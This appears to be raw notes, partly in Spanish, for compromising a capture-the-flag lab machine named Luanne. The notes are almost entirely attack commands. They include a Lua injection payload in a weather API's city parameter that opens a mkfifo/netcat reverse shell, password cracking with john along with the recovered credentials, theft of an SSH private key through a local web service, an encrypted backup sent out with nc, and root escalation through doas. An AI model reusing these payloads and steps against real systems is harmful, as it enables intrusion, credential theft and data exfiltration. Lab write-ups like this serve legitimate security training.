nmap -A -p- -oA output 10.129.151.88 --min-rate=10000 --script=vuln --script-imeout=15 -v
nmap -sC -sV -O -p- -oA luanne 10.129.151.88
nmap -sU -O -p- -oA luanne-udp 10.129.151.88
nikto -h 10.129.151.88 :80
whatweb http://10.129.151.88
http://10.129.151.88/robots.txt
wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ
http://10.129.151.88/weather/forecast
curl -s -X GET "http://10.129.151.88/weather/forecast?city=London" | jq
Abrimos burpsuite y interceptamos
GET /weather/forecast?city=list
GET /weather/forecast?city=list']%3b+os.execute['id']--+-'
nc -lvnp 443
GET /weather/forecast?city=list']%3b+os.execute['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f']--+-'
Le hacemos Ctrl +U para ulrencode
cat .htpasswd
guardamos el webapi_user y su contrasena en un archivo llamado hash
john --wordlist=/usr/share/wordlists/rockyou..txt hash
Credenciales-> webapi_user:iamthebest
ps -auwx
curl -s -X GET http://127.0.0.1:3001
curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u 'webapi_user:iamthebest'; echo
Creamos un id_rsa
chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.129.151.88
cd backups
cat devel_backup-2020-09-16.tar.gz.enc
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/backup.tar.gz
nc 10.10.14.21 < backup.tar.gz
nc -lvnp 443 > backup.tar.gz
cat .htpasswd
vim hash2
john --worldlist=/usr/share/worldlists/rockyou.txt hash2
Credenciales->root:littlebear
doas su root